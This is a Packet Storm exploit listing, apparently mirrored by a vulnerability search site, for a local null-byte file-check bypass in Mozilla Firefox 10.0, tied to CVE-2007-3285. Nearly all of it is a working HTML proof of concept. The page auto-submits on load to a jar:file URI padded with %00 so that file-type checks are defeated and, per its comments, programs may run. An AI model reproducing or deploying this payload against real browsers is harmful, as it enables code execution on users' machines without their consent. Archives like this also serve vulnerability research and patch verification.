Lucene search

K
packetstormTodor DonevPACKETSTORM:109580
HistoryFeb 08, 2012 - 12:00 a.m.

Mozilla Firefox 10.0 Local Null Byte Bypass File Check Execution

2012-02-0800:00:00
Todor Donev
packetstormsecurity.com
26

EPSS

0.045

Percentile

92.6%

`<!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit -->  
<!-- -->  
<!-- Vuln risk level: Medium -->  
<!-- Author: Todor Donev -->  
<!-- Author mail: todor.donev@@gmail.com -->  
<!-- -->  
<!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: -->  
<!-- URI with a dangerous extension.-->  
<!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more -->  
<!-- -->  
<!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN -->   
<!-- -->  
<!-- Greetz Tsvetelina Emirska again.. =) -->  
<!-- -->  
<html>  
<body onLoad=javascript:document.form.submit()>  
<form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form">  
</form>  
</body>  
</html>  
<!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->  
`